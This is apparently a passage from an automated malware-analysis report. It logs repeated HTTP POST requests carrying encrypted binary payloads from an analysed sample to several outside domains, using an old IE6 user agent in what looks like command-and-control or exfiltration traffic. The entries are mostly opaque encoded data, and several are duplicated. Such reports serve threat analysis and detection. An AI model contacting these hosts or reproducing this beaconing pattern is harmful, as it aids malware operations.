vlw6UnW7x8osqzv73Baxa273IHEDzLwUebeOd9fkNSpnAvTESk8+DfcC+aCI1xKGKLh+jFwqJp5R43lsJKXliGGl+YvrOIlEfktz+gB9erTVPWchwwxeDwqrxzMUPwEcaPctqWaoPdkWjBIjRV6yCyLxhIdgjzeT1xee76weSvUGtqGsUiRDF6wnmQz/VdOnurkXY5XfJAmx2VioAicdvEDPALOCTwJvPnj1pZ4ubfHQmsxLnaAn9n1xRrllGqeHOaXc4PTWn0Z7B7w+CGOunciU6lhuz9P5Gh9ifL4bCq943ZsqX7fcshIVE9xkC+7H6CZ7EpA1jmNWzuRJNWpSLwcBWanpQqLZT39XlkbY/poMhZ3jL2UJ6NHxHBHdXEzFQxFVDrpfhcqoRx9l0CS1CjBZ/QJIxAczv0rOq9eUUhj5FRRhx1AHVvxPP6XH6yPfRq6rA80Zi+IeLq8wb6XH+yh3AKxApSRTaAfATSasG0+E7RUGi1DXCoG+AgoFlcMK7ztVcUN2liE9OU+cN67UELPByLE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 58 2b 6e 36 57 72 4b 6b 32 4d 6f 5a 2f 70 76 67 35 54 78 77 38 4c 58 59 64 42 43 43 72 68 58 39 42 70 35 74 4a 69 64 6e 7a 73 62 4f 31 73 42 31 46 69 71 62 55 77 6a 79 50 6b 47 66 79 4a 37 2f 59 2b 4f 4f 4e 63 57 63 55 31 4a 4a 34 42 41 57 77 55 58 59 55 71 73 73 66 53 78 6e 49 66 54 77 45 56 47 6c 55 63 59 2f 46 48 52 6c 63 53 64 76 72 54 61 67 6f 33 38 75 38 44 58 69 33 74 71 57 61 37 34 68 53 32 6e 4a 65 75 72 36 42 46 36 67 58 34 5a 43 52 53 39 37 53 4e 36 6e 4f 74 50 57 70 2b 71 34 34 76 34 39 46 6d 77 67 32 76 6e 79 51 41 4d 30 6e 74 54 6d 64 69 46 78 7a 2b 59 37 36 54 36 6b 74 56 67 37 4a 2f 70 6a 73 70 62 6a 36 6f 74 75 59 76 47 59 6d 53 7a 4c 4d 69 75 65 62 64 30 4e 59 31 68 54 41 4a 63 37 6f 69 68 50 51 6d 59 53 66 4c 36 56 4c 68 33 4f 4c 41 65 6e 37 56 7a 76 68 45 2f 79 72 32 32 67 73 74 62 78 61 34 52 41 5a 4e 66 77 78 65 48 61 54 30 6c 4a 70 73 45 38 42 31 36 66 37 4a 61 66 4e 34 70 52 34 6c 52 51 45 37 47 75 62 77 4c 74 69 59 4f 37 70 2b 6e 66 44 50 4c 57 74 51 56 41 4e 39 39 52 48 31 68 4b 6c 34 4e 6a 55 41 6e 62 63 56 67 4f 6c 55 6f 31 34 45 62 4c 32 45 75 32 39 73 51 6d 53 73 6e 6a 6d 41 56 68 6b 6f 2f 57 38 45 79 79 71 78 7a 6b 6e 6b 6d 39 6f 76 2b 34 50 39 62 36 6e 54 2b 47 37 39 6a 36 6e 2f 63 58 73 59 72 47 73 54 70 4c 70 45 4d 7a 4d 70 34 63 56 6e 36 77 64 30 30 4a 7a 68 63 43 57 36 71 5a 2b 63 62 75 76 6b 6d 62 2b 65 37 6f 43 47 5a 50 73 4d 73 30 50 55 75 71 4f 74 2f 37 71 6a 4a 4f 77 4a 66 78 61 72 43 32 50 49 62 42 49 76 43 7a 71 54 37 4c 49 39 57 31 61 2b 47 42 70 44 49 55 31 31 6c 75 53 6c 38 30 4b 67 61 54 66 42 36 48 2b 45 75 7a 33 44 33 78 65 67 3d 3d Data Ascii: X+n6WrKk2MoZ/pvg5Txw8LXYdBCCrhX9Bp5tJidnzsbO1sB1FiqbUwjyPkGfyJ7/Y+OONcWcU1JJ4BAWwUXYUqssfSxnIfTwEVGlUcY/FHRlcSdvrTago38u8DXi3tqWa74hS2nJeur6BF6gX4ZCRS97SN6nOtPWp+q44v49Fmwg2vnyQAM0ntTmdiFxz+Y76T6ktVg7J/pjspbj6otuYvGYmSzLMiuebd0NY1hTAJc7oihPQmYSfL6VLh3OLAen7VzvhE/yr22gstbxa4RAZNfwxeHaT0lJpsE8B16f7JafN4pR4lRQE7GubwLtiYO7p+nfDPLWtQVAN99RH1hKl4NjUAnbcVgOlUo14EbL2Eu29sQmSsnjmAVhko/W8Eyyqxzknkm9ov+4P9b6nT+G79j6n/cXsYrGsTpLpEMzMp4cVn6wd00JzhcCW6qZ+cbuvkmb+e7oCGZPsMs0PUuqOt/7qjJOwJfxarC2PIbBIvCzqT7LI9W1a+GBpDIU11luSl80KgaTfB6H+Euz3D3xeg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 66 73 33 6c 2b 76 47 46 31 63 70 79 66 2f 57 75 45 4d 59 74 73 55 6f 7a 49 4e 34 76 50 67 67 6f 74 51 4f 76 41 54 77 38 68 41 41 59 2b 65 30 50 4c 6e 31 6b 66 48 55 6a 58 6e 2f 77 75 39 49 59 66 45 52 6b 6c 6d 62 43 46 33 41 4f 56 64 61 37 7a 74 42 47 63 32 50 58 34 2b 30 38 6a 31 41 41 6d 47 46 37 62 75 36 37 6f 67 5a 47 36 6d 47 4d 6f 6a 39 55 72 48 75 33 46 4f 34 73 74 36 54 35 69 59 53 59 65 36 72 4d 35 50 4c 76 73 77 48 6c 44 56 57 6c 6f 6e 68 44 73 68 47 70 5a 66 57 72 54 4d 61 70 76 6c 4f 59 77 5a 39 77 4f 38 4a 4b 77 54 4e 58 7a 73 34 4b 71 7a 4f 41 42 6c 39 4f 30 55 49 34 58 46 69 4d 55 46 52 55 7a 35 35 78 6a 58 71 4e 4f 46 31 58 43 5a 50 66 41 6b 63 4b 49 71 79 38 61 48 66 45 54 53 74 51 57 4d 49 33 68 72 38 4d 79 35 64 6f 58 75 76 6e 79 66 6f 65 62 38 35 4a 72 76 55 78 56 31 4c 75 6c 2b 43 66 69 2f 39 51 5a 57 5a 7a 54 78 73 4c 63 74 54 34 51 51 38 66 38 4f 69 31 57 78 33 4d 75 45 54 42 32 35 6e 4f 56 6d 45 63 59 45 66 4e 37 45 5a 53 5a 62 33 61 4b 2f 79 33 31 55 71 2f 50 64 63 46 6c 2b 79 6d 48 71 30 55 52 79 36 45 47 7a 2f 62 7a 42 52 73 43 78 61 39 39 77 76 2b 39 38 71 44 39 37 52 38 34 4b 73 64 31 65 4d 4a 2f 45 68 2f 62 32 34 6d 51 74 63 37 2f 34 4e 71 66 74 5a 6d 77 49 42 71 65 6c 47 7a 78 44 4b 4c 76 59 51 6b 48 39 4c 58 64 2f 55 71 61 49 5a 4e 61 59 6c 31 42 44 71 6b 48 69 56 73 6b 38 42 37 43 6e 6a 6d 6b 61 35 6a 2b 51 46 6b 53 6c 4e 30 53 46 5a 79 71 34 46 7a 70 46 50 30 67 4d 61 73 4e 70 53 56 56 42 6e 7a 75 70 44 6f 34 6f 4b 46 2f 46 59 65 67 41 79 52 30 43 53 46 71 62 7a 34 4f 42 4b 66 44 58 50 55 43 46 63 47 77 61 53 4a 50 62 61 55 70 34 4c 4e 54 42 35 71 56 56 76 50 6b 37 51 4c 4e 7a 54 72 63 79 4c 56 43 34 79 6b 50 59 4a 6d 4e 5a 5a 59 64 7a 65 55 77 65 53 43 56 59 49 52 58 79 63 3d Data Ascii: fs3l+vGF1cpyf/WuEMYtsUozIN4vPggotQOvATw8hAAY+e0PLn1kfHUjXn/wu9IYfERklmbCF3AOVda7ztBGc2PX4+08j1AAmGF7bu67ogZG6mGMoj9UrHu3FO4st6T5iYSYe6rM5PLvswHlDVWlonhDshGpZfWrTMapvlOYwZ9wO8JKwTNXzs4KqzOABl9O0UI4XFiMUFRUz55xjXqNOF1XCZPfAkcKIqy8aHfETStQWMI3hr8My5doXuvnyfoeb85JrvUxV1Lul+Cfi/9QZWZzTxsLctT4QQ8f8Oi1Wx3MuETB25nOVmEcYEfN7EZSZb3aK/y31Uq/PdcFl+ymHq0URy6EGz/bzBRsCxa99wv+98qD97R84Ksd1eMJ/Eh/b24mQtc7/4NqftZmwIBqelGzxDKLvYQkH9LXd/UqaIZNaYl1BDqkHiVsk8B7Cnjmka5j+QFkSlN0SFZyq4FzpFP0gMasNpSVVBnzupDo4oKF/FYegAyR0CSFqbz4OBKfDXPUCFcGwaSJPbaUp4LNTB5qVVvPk7QLNzTrcyLVC4ykPYJmNZZYdzeUweSCVYIRXyc=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheData Raw: 7a 34 4a 63 4d 67 34 53 74 73 71 48 51 41 36 47 6d 58 49 39 31 6e 45 65 44 37 30 4f 62 58 69 69 49 6f 73 43 7a 66 51 75 41 39 2f 50 61 57 78 31 77 4f 78 75 36 48 70 76 44 4e 71 65 30 58 79 4e 66 42 42 7a 48 31 6d 78 69 6f 62 43 66 77 69 62 65 55 70 72 49 4a 52 62 2f 6a 4a 71 34 6f 79 74 4d 6a 62 52 32 5a 47 6a 50 73 4c 73 4b 6f 38 70 37 58 64 62 53 43 4e 41 41 36 4c 35 5a 4c 6c 67 6f 75 4d 2b 45 38 4b 57 68 4e 46 31 78 6c 72 30 6f 63 6a 79 34 42 68 58 53 56 75 42 31 33 4d 34 41 70 67 53 35 51 52 73 57 49 77 36 79 4a 65 48 2f 4a 6b 31 55 47 73 71 74 2f 65 54 32 4e 6f 6f 4c 59 64 51 75 34 7a 79 32 71 4f 5a 66 6d 34 4a 2f 72 73 64 71 49 6b 4a 4d 59 4b 74 50 31 4e 63 61 68 59 59 47 64 2b 4a 6b 59 57 78 42 50 73 6a 45 6b 32 4e 77 4f 62 59 68 73 42 53 72 57 37 77 6a 47 69 44 31 4f 42 50 65 65 4c 57 45 50 4f 5a 46 66 65 75 4b 50 4d 65 48 4b 74 51 42 55 51 59 72 4e 65 66 6d 59 39 67 43 68 6c 43 47 2b 6c 70 59 66 6f 4d 66 2f 31 68 61 72 39 66 61 5a 6e 71 70 31 76 59 75 77 4b 54 58 34 36 79 4e 55 37 65 2f 7a 55 74 64 70 5a 7a 46 55 66 56 75 4b 74 4c 48 71 31 4c 30 65 65 6f 2f 36 4c 65 62 2f 56 66 6b 5a 35 70 71 49 34 57 50 4e 59 6f 4b 35 66 41 37 57 53 69 44 63 31 4a 55 55 48 34 45 4f 67 46 47 6d 6a 53 36 48 4c 75 6a 70 35 76 6a 54 4b 48 32 78 4f 35 44 59 4f 64 46 48 76 30 79 48 4d 69 31 4a 4a 48 53 53 31 4a 70 6d 63 52 30 54 50 59 44 62 59 65 64 48 63 31 30 4b 62 64 4e 6a 76 4f 30 4c 71 55 6e 66 43 48 41 4a 56 64 54 70 70 47 55 6e 46 66 6c 65 36 39 51 61 6c 49 30 2b 54 4b 65 63 31 36 58 43 56 4d 72 54 6e 50 6b 52 50 4f 32 79 63 2f 5a 62 72 2f 31 44 73 45 48 77 54 65 6f 43 68 2b 4a 30 35 5a 79 45 57 36 30 41 4d 76 6d 41 3d 3d Data Ascii: z4JcMg4StsqHQA6GmXI91nEeD70ObXiiIosCzfQuA9/PaWx1wOxu6HpvDNqe0XyNfBBzH1mxiobCfwibeUprIJRb/jJq4oytMjbR2ZGjPsLsKo8p7XdbSCNAA6L5ZLlgouM+E8KWhNF1xlr0ocjy4BhXSVuB13M4ApgS5QRsWIw6yJeH/Jk1UGsqt/eT2NooLYdQu4zy2qOZfm4J/rsdqIkJMYKtP1NcahYYGd+JkYWxBPsjEk2NwObYhsBSrW7wjGiD1OBPeeLWEPOZFfeuKPMeHKtQBUQYrNefmY9gChlCG+lpYfoMf/1har9faZnqp1vYuwKTX46yNU7e/zUtdpZzFUfVuKtLHq1L0eeo/6Leb/VfkZ5pqI4WPNYoK5fA7WSiDc1JUUH4EOgFGmjS6HLujp5vjTKH2xO5DYOdFHv0yHMi1JJHSS1JpmcR0TPYDbYedHc10KbdNjvO0LqUnfCHAJVdTppGUnFfle69QalI0+TKec16XCVMrTnPkRPO2yc/Zbr/1DsEHwTeoCh+J05ZyEW60AMvmA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 58 2b 6e 36 57 72 4b 6b 32 4d 6f 5a 2f 70 76 67 35 54 78 77 38 4c 58 59 64 42 43 43 72 68 58 39 42 70 35 74 4a 69 64 6e 7a 73 62 4f 31 73 42 31 46 69 71 62 55 77 6a 79 50 6b 47 66 79 4a 37 2f 59 2b 4f 4f 4e 63 57 63 55 31 4a 4a 34 42 41 57 77 55 58 59 55 71 73 73 66 53 78 6e 49 66 54 77 45 56 47 6c 55 63 59 2f 46 48 52 6c 63 53 64 76 72 54 61 67 6f 33 38 75 38 44 58 69 33 74 71 57 61 37 34 68 53 32 6e 4a 65 75 72 36 42 46 36 67 58 34 5a 43 52 53 39 37 53 4e 36 6e 4f 74 50 57 70 2b 71 34 34 76 34 39 46 6d 77 67 32 76 6e 79 51 41 4d 30 6e 74 54 6d 64 69 46 78 7a 2b 59 37 36 54 36 6b 74 56 67 37 4a 2f 70 6a 73 70 62 6a 36 6f 74 75 59 76 47 59 6d 53 7a 4c 4d 69 75 65 62 64 30 4e 59 31 68 54 41 4a 63 37 6f 69 68 50 51 6d 59 53 66 4c 36 56 4c 68 33 4f 4c 41 65 6e 37 56 7a 76 68 45 2f 79 72 32 32 67 73 74 62 78 61 34 52 41 5a 4e 66 77 78 65 48 61 54 30 6c 4a 70 73 45 38 42 31 36 66 37 4a 61 66 4e 34 70 52 34 6c 52 51 45 37 47 75 62 77 4c 74 69 59 4f 37 70 2b 6e 66 44 50 4c 57 74 51 56 41 4e 39 39 52 48 31 68 4b 6c 34 4e 6a 55 41 6e 62 63 56 67 4f 6c 55 6f 31 34 45 62 4c 32 45 75 32 39 73 51 6d 53 73 6e 6a 6d 41 56 68 6b 6f 2f 57 38 45 79 79 71 78 7a 6b 6e 6b 6d 39 6f 76 2b 34 50 39 62 36 6e 54 2b 47 37 39 6a 36 6e 2f 63 58 73 59 72 47 73 54 70 4c 70 45 4d 7a 4d 70 34 63 56 6e 36 77 64 30 30 4a 7a 68 63 43 57 36 71 5a 2b 63 62 75 76 6b 6d 62 2b 65 37 6f 43 47 5a 50 73 4d 73 30 50 55 75 71 4f 74 2f 37 71 6a 4a 4f 77 4a 66 78 61 72 43 32 50 49 62 42 49 76 43 7a 71 54 37 4c 49 39 57 31 61 2b 47 42 70 44 49 55 31 31 6c 75 53 6c 38 30 4b 67 61 54 66 42 36 48 2b 45 75 7a 33 44 33 78 65 67 3d 3d Data Ascii: X+n6WrKk2MoZ/pvg5Txw8LXYdBCCrhX9Bp5tJidnzsbO1sB1FiqbUwjyPkGfyJ7/Y+OONcWcU1JJ4BAWwUXYUqssfSxnIfTwEVGlUcY/FHRlcSdvrTago38u8DXi3tqWa74hS2nJeur6BF6gX4ZCRS97SN6nOtPWp+q44v49Fmwg2vnyQAM0ntTmdiFxz+Y76T6ktVg7J/pjspbj6otuYvGYmSzLMiuebd0NY1hTAJc7oihPQmYSfL6VLh3OLAen7VzvhE/yr22gstbxa4RAZNfwxeHaT0lJpsE8B16f7JafN4pR4lRQE7GubwLtiYO7p+nfDPLWtQVAN99RH1hKl4NjUAnbcVgOlUo14EbL2Eu29sQmSsnjmAVhko/W8Eyyqxzknkm9ov+4P9b6nT+G79j6n/cXsYrGsTpLpEMzMp4cVn6wd00JzhcCW6qZ+cbuvkmb+e7oCGZPsMs0PUuqOt/7qjJOwJfxarC2PIbBIvCzqT7LI9W1a+GBpDIU11luSl80KgaTfB6H+Euz3D3xeg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 78 6a 59 44 7a 67 64 68 33 4d 6f 33 56 65 39 73 4e 71 72 33 30 64 43 34 4d 6b 44 39 33 64 72 7a 4b 7a 32 6f 69 47 33 6b 59 56 64 66 4e 56 4d 5a 2f 36 6e 6c 69 45 6d 61 42 52 34 49 58 4e 6c 36 4c 2f 72 62 43 61 2f 73 39 36 45 39 63 68 62 62 32 43 6d 47 31 6b 51 66 63 5a 62 58 68 33 7a 55 70 6f 6a 79 48 61 6e 59 70 4f 45 71 56 37 30 4f 53 69 61 43 50 66 74 72 4f 73 33 52 50 7a 55 64 6a 6c 4c 6c 31 42 63 46 70 4c 2f 6a 75 52 65 37 6b 63 41 36 78 62 65 30 41 4e 42 70 36 64 41 44 6b 4f 61 7a 58 69 43 70 76 41 50 45 65 71 6d 75 36 4a 39 78 67 73 39 4d 48 49 54 4d 68 70 30 52 2b 67 59 78 62 6a 43 37 6c 76 31 73 79 6c 68 2b 61 4a 57 37 7a 43 56 7a 71 78 2b 34 39 4d 45 4a 49 2b 76 2f 4b 79 6f 51 7a 76 38 7a 6a 6d 59 69 49 4c 6d 38 6a 64 49 65 6a 55 76 67 56 67 4c 37 47 32 43 4e 54 30 5a 4c 6a 51 68 51 62 77 56 30 57 32 38 57 37 73 55 30 41 42 41 35 33 44 74 36 68 38 55 65 39 53 54 44 35 46 4b 68 62 4b 6a 31 7a 53 4f 7a 75 52 42 5a 38 35 67 56 43 35 61 62 66 64 6a 76 7a 45 61 69 66 77 79 58 63 45 6c 68 51 6c 68 36 73 47 36 68 66 73 64 72 74 4b 77 5a 66 42 47 45 6c 59 62 4e 73 30 58 4d 50 2f 67 36 6c 33 75 45 36 6a 44 5a 69 36 34 78 2f 37 31 54 58 5a 50 59 46 52 42 54 6d 6e 6c 35 75 78 48 53 74 39 48 39 73 62 4c 4b 71 33 4c 7a 6b 57 45 74 6d 45 49 6f 52 7a 44 79 48 47 2f 47 73 44 2b 49 31 56 39 41 38 70 32 6c 2f 6d 42 53 34 67 68 66 4a 33 4b 56 79 41 44 61 37 51 66 6b 52 34 78 37 7a 51 4b 32 57 75 34 50 38 76 56 56 41 7a 4a 76 78 4a 6d 4f 4b 4c 5a 78 67 34 58 64 4c 4f 78 4d 47 32 39 69 58 45 76 6d 31 2f 73 41 4b 55 4d 69 59 6d 55 49 73 66 74 5a 6b 4e 56 35 57 54 67 4b 79 57 6b 6f 38 6a 54 59 35 59 58 6a 73 51 4a 52 55 65 6d 35 Data Ascii: xjYDzgdh3Mo3Ve9sNqr30dC4MkD93drzKz2oiG3kYVdfNVMZ/6nliEmaBR4IXNl6L/rbCa/s96E9chbb2CmG1kQfcZbXh3zUpojyHanYpOEqV70OSiaCPftrOs3RPzUdjlLl1BcFpL/juRe7kcA6xbe0ANBp6dADkOazXiCpvAPEeqmu6J9xgs9MHITMhp0R+gYxbjC7lv1sylh+aJW7zCVzqx+49MEJI+v/KyoQzv8zjmYiILm8jdIejUvgVgL7G2CNT0ZLjQhQbwV0W28W7sU0ABA53Dt6h8Ue9STD5FKhbKj1zSOzuRBZ85gVC5abfdjvzEaifwyXcElhQlh6sG6hfsdrtKwZfBGElYbNs0XMP/g6l3uE6jDZi64x/71TXZPYFRBTmnl5uxHSt9H9sbLKq3LzkWEtmEIoRzDyHG/GsD+I1V9A8p2l/mBS4ghfJ3KVyADa7QfkR4x7zQK2Wu4P8vVVAzJvxJmOKLZxg4XdLOxMG29iXEvm1/sAKUMiYmUIsftZkNV5WTgKyWko8jTY5YXjsQJRUem5
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 43 49 72 30 7a 59 35 67 33 4d 72 4c 6b 36 6a 4a 47 57 37 32 78 66 48 73 6a 6b 61 4f 33 56 51 61 6f 6f 45 4b 44 72 52 39 30 53 4d 2f 4f 6a 6f 73 30 61 4d 77 68 66 4d 70 52 4d 42 63 48 44 55 46 6c 39 7a 79 79 79 61 2f 68 76 4f 53 2b 35 2b 72 65 43 37 70 4a 36 4e 5a 49 78 43 4e 56 34 6f 66 47 4a 54 63 68 52 6c 46 31 61 48 56 38 46 39 4a 33 65 53 67 6f 62 56 38 46 75 35 31 31 66 66 65 76 2b 7a 4e 35 35 4d 48 6c 79 58 42 4b 4e 53 34 4a 4e 70 59 46 70 75 71 4a 44 6f 49 4b 2f 56 70 68 79 6a 4a 33 47 37 70 79 54 7a 5a 6e 7a 7a 77 45 38 31 71 74 51 2f 37 74 63 35 67 79 31 50 44 45 54 67 65 6f 4a 66 46 51 70 4e 62 54 35 4e 75 6a 5a 6d 33 31 34 6d 6e 4d 4c 4f 31 2f 59 34 62 33 6a 61 58 42 37 61 33 44 46 75 52 68 42 63 50 69 36 75 47 59 75 61 32 75 70 4e 4a 6f 58 65 37 65 56 62 79 35 43 4e 48 58 76 4b 33 4a 70 43 33 35 47 7a 44 41 35 47 6f 44 65 53 6a 48 58 58 69 59 61 48 48 6c 59 6c 6e 43 39 30 52 2f 4e 70 4a 6b 32 36 33 6b 43 76 37 63 4a 2b 4c 69 41 6c 2f 6a 59 6b 70 45 69 4e 4f 55 6e 7a 79 54 66 43 38 78 44 42 52 49 57 2b 48 41 2f 74 70 6a 5a 2f 62 67 41 59 61 79 4d 53 33 48 6b 48 43 55 70 56 36 64 69 76 52 57 75 51 6f 52 53 36 48 31 37 5a 59 63 34 46 35 53 74 6c 32 64 74 67 6a 71 37 58 69 66 39 79 45 64 65 4d 4c 52 67 41 6e 6a 70 39 30 4f 51 58 75 5a 62 50 6c 47 49 35 49 5a 68 35 4e 2b 76 56 51 73 53 6e 47 32 2f 4f 64 33 4d 38 62 73 71 63 4e 47 38 42 43 61 48 5a 34 72 73 45 42 69 2f 66 46 38 78 46 42 38 4d 58 50 65 36 52 42 65 62 37 46 48 75 7a 50 42 50 50 75 52 35 4a 41 4b 4b 6f 45 57 70 30 65 57 70 35 55 72 63 79 4a 36 50 49 58 68 44 70 5a 6f 6b 7a 65 36 4a 53 52 5a 50 43 38 46 6a 72 6c 46 32 39 79 33 6e 78 75 32 5a 67 64 53 58 50 71 53 45 63 70 51 39 46 69 72 51 45 6b 62 72 6d 36 65 30 41 59 32 59 75 54 73 36 33 2b 75 4f 45 3d Data Ascii: CIr0zY5g3MrLk6jJGW72xfHsjkaO3VQaooEKDrR90SM/Ojos0aMwhfMpRMBcHDUFl9zyyya/hvOS+5+reC7pJ6NZIxCNV4ofGJTchRlF1aHV8F9J3eSgobV8Fu511ffev+zN55MHlyXBKNS4JNpYFpuqJDoIK/VphyjJ3G7pyTzZnzzwE81qtQ/7tc5gy1PDETgeoJfFQpNbT5NujZm314mnMLO1/Y4b3jaXB7a3DFuRhBcPi6uGYua2upNJoXe7eVby5CNHXvK3JpC35GzDA5GoDeSjHXXiYaHHlYlnC90R/NpJk263kCv7cJ+LiAl/jYkpEiNOUnzyTfC8xDBRIW+HA/tpjZ/bgAYayMS3HkHCUpV6divRWuQoRS6H17ZYc4F5Stl2dtgjq7Xif9yEdeMLRgAnjp90OQXuZbPlGI5IZh5N+vVQsSnG2/Od3M8bsqcNG8BCaHZ4rsEBi/fF8xFB8MXPe6RBeb7FHuzPBPPuR5JAKKoEWp0eWp5UrcyJ6PIXhDpZokze6JSRZPC8FjrlF29y3nxu2ZgdSXPqSEcpQ9FirQEkbrm6e0AY2YuTs63+uOE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 2f 70 30 4f 66 48 4e 6e 30 63 70 70 75 62 37 2f 75 67 61 45 45 68 7a 4b 34 6d 4c 5a 77 6f 4d 6f 56 78 52 49 63 42 67 58 6b 78 6b 78 2f 71 76 63 66 59 33 46 4d 54 71 5a 74 6c 43 36 6f 52 6e 31 62 52 43 45 35 54 63 66 6d 54 64 61 4c 70 70 50 4c 67 57 47 74 68 48 45 66 2b 4d 4b 63 67 50 34 42 59 6d 57 6e 35 45 4a 43 34 77 32 35 6a 45 79 63 54 68 43 65 4e 74 43 34 71 78 70 63 4c 48 49 50 44 72 4c 39 74 6d 48 4a 39 4e 32 58 64 53 39 5a 4a 2b 75 34 69 78 68 59 39 41 74 4b 64 59 2f 54 49 65 67 7a 77 46 35 67 31 73 42 4c 65 61 44 45 78 53 75 38 6d 73 37 68 55 4f 4c 4b 4b 68 74 33 33 6b 78 33 69 45 58 6e 62 51 36 53 38 65 72 31 74 6b 47 61 45 72 63 35 31 78 37 77 36 30 2b 76 2f 46 6d 47 64 4a 48 30 4c 43 2b 76 2f 47 59 4f 65 6e 58 49 76 64 32 45 41 47 2f 76 70 59 44 55 57 59 55 4c 6c 73 6b 36 47 4c 35 62 50 4b 39 6d 59 4c 77 79 55 4b 6c 45 59 4f 6a 4f 54 34 42 48 4c 44 57 4a 78 46 33 4f 59 44 45 53 6f 37 6f 57 77 30 2f 39 6e 36 54 2f 77 59 6f 4f 42 47 6c 76 67 6f 66 66 49 31 34 75 42 65 4f 65 78 78 4b 52 44 47 71 38 45 78 71 4b 30 52 67 55 72 70 63 52 33 77 34 57 72 42 45 45 32 64 70 52 55 36 32 47 55 59 61 70 76 4b 66 44 38 59 32 34 56 65 45 6a 35 36 5a 35 2b 42 33 43 74 46 76 49 73 57 52 48 46 74 77 69 6c 78 74 6e 32 65 2b 51 2b 53 41 47 79 4f 54 48 57 42 4f 71 51 46 2b 45 43 50 35 7a 4e 2b 34 51 4b 67 55 76 46 6b 48 53 75 62 53 32 76 57 72 79 49 5a 4f 42 37 69 52 33 37 4a 4c 65 44 58 4d 79 41 50 7a 47 48 5a 4a 39 69 5a 46 43 48 67 5a 79 47 71 75 50 78 30 41 74 4d 58 76 79 2b 37 45 57 32 55 67 64 53 44 7a 33 6b 36 30 2b 53 73 2b 76 4b 37 73 57 47 6c 36 66 57 44 79 2b 74 36 47 69 54 47 74 4d 50 4f 77 61 42 53 73 31 67 4b 66 34 66 30 3d Data Ascii: /p0OfHNn0cppub7/ugaEEhzK4mLZwoMoVxRIcBgXkxkx/qvcfY3FMTqZtlC6oRn1bRCE5TcfmTdaLppPLgWGthHEf+MKcgP4BYmWn5EJC4w25jEycThCeNtC4qxpcLHIPDrL9tmHJ9N2XdS9ZJ+u4ixhY9AtKdY/TIegzwF5g1sBLeaDExSu8ms7hUOLKKht33kx3iEXnbQ6S8er1tkGaErc51x7w60+v/FmGdJH0LC+v/GYOenXIvd2EAG/vpYDUWYULlsk6GL5bPK9mYLwyUKlEYOjOT4BHLDWJxF3OYDESo7oWw0/9n6T/wYoOBGlvgoffI14uBeOexxKRDGq8ExqK0RgUrpcR3w4WrBEE2dpRU62GUYapvKfD8Y24VeEj56Z5+B3CtFvIsWRHFtwilxtn2e+Q+SAGyOTHWBOqQF+ECP5zN+4QKgUvFkHSubS2vWryIZOB7iR37JLeDXMyAPzGHZJ9iZFCHgZyGquPx0AtMXvy+7EW2UgdSDz3k60+Ss+vK7sWGl6fWDy+t6GiTGtMPOwaBSs1gKf4f0=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 78 6a 59 44 7a 67 64 68 33 4d 6f 33 56 65 39 73 4e 71 72 33 30 64 43 34 4d 6b 44 39 33 64 72 7a 4b 7a 32 6f 69 47 33 6b 59 56 64 66 4e 56 4d 5a 2f 36 6e 6c 69 45 6d 61 42 52 34 49 58 4e 6c 36 4c 2f 72 62 43 61 2f 73 39 36 45 39 63 68 62 62 32 43 6d 47 31 6b 51 66 63 5a 62 58 68 33 7a 55 70 6f 6a 79 48 61 6e 59 70 4f 45 71 56 37 30 4f 53 69 61 43 50 66 74 72 4f 73 33 52 50 7a 55 64 6a 6c 4c 6c 31 42 63 46 70 4c 2f 6a 75 52 65 37 6b 63 41 36 78 62 65 30 41 4e 42 70 36 64 41 44 6b 4f 61 7a 58 69 43 70 76 41 50 45 65 71 6d 75 36 4a 39 78 67 73 39 4d 48 49 54 4d 68 70 30 52 2b 67 59 78 62 6a 43 37 6c 76 31 73 79 6c 68 2b 61 4a 57 37 7a 43 56 7a 71 78 2b 34 39 4d 45 4a 49 2b 76 2f 4b 79 6f 51 7a 76 38 7a 6a 6d 59 69 49 4c 6d 38 6a 64 49 65 6a 55 76 67 56 67 4c 37 47 32 43 4e 54 30 5a 4c 6a 51 68 51 62 77 56 30 57 32 38 57 37 73 55 30 41 42 41 35 33 44 74 36 68 38 55 65 39 53 54 44 35 46 4b 68 62 4b 6a 31 7a 53 4f 7a 75 52 42 5a 38 35 67 56 43 35 61 62 66 64 6a 76 7a 45 61 69 66 77 79 58 63 45 6c 68 51 6c 68 36 73 47 36 68 66 73 64 72 74 4b 77 5a 66 42 47 45 6c 59 62 4e 73 30 58 4d 50 2f 67 36 6c 33 75 45 36 6a 44 